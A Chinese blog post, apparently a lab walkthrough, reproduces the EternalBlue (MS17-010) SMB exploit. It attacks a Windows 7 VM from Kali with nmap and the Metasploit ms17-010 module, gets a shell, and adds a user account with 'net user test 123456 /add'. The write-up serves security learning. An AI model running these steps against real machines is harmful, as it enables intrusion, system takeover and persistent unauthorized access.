ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

永恒之蓝(MS17-010)漏洞复现

2022-08-02 13:33:50  阅读:169  来源: 互联网

标签:kali 192.168 010 227.130 MS17 复现 永恒 靶机


1. 漏洞介绍

  1. 永恒之蓝:

恒之蓝是指2017年4月14日晚,黑客团体Shadow
Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

复现准备

  1. kali linux
  2. win7 靶机 (关闭防火墙)
    3. !](https://www.icode9.com/i/ll/?i=2c44806224f34edfa7f73c27bdcaedda.png)
注: 两台机器需在本地的同一个网段内   复现环境我的kali的地址为192.168.227.129 win7靶机为192.168.227.130 

过程:

  1. 防止出问题 先利用kali机ping一下靶机
ping 192.168.227.130

在这里插入图片描述
直接nmap一把梭 扫描靶机

nmap 192.168.227.130

在这里插入图片描述
可以看到445端口是开放的,因为我们需要利用的就是445端口

  1. 启动msfconsole
  2. 在这里插入图片描述
    然后搜索ms17-010
    在这里插入图片描述
    然后直接use 0 第一个
    在这里插入图片描述
再用 show options 查看需要配置的参数

在这里插入图片描述
设置攻击ip

set rhosts  192.168.227.130

在这里插入图片描述

然后run

在这里插入图片描述
发现已经攻击成功 成功拿到的shell
在这里插入图片描述
但是乱码 网上赵了一下教程

chcp 65001 

可解决乱码问题。
发现成功执行
在这里插入图片描述

net user test 123456 /add

来到win7靶机查看用户 (其实kali也可以 不过严谨一点)
在这里插入图片描述
永恒之蓝复现就到此结束。

标签:kali,192.168,010,227.130,MS17,复现,永恒,靶机
来源: https://www.cnblogs.com/snail7/p/16543390.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有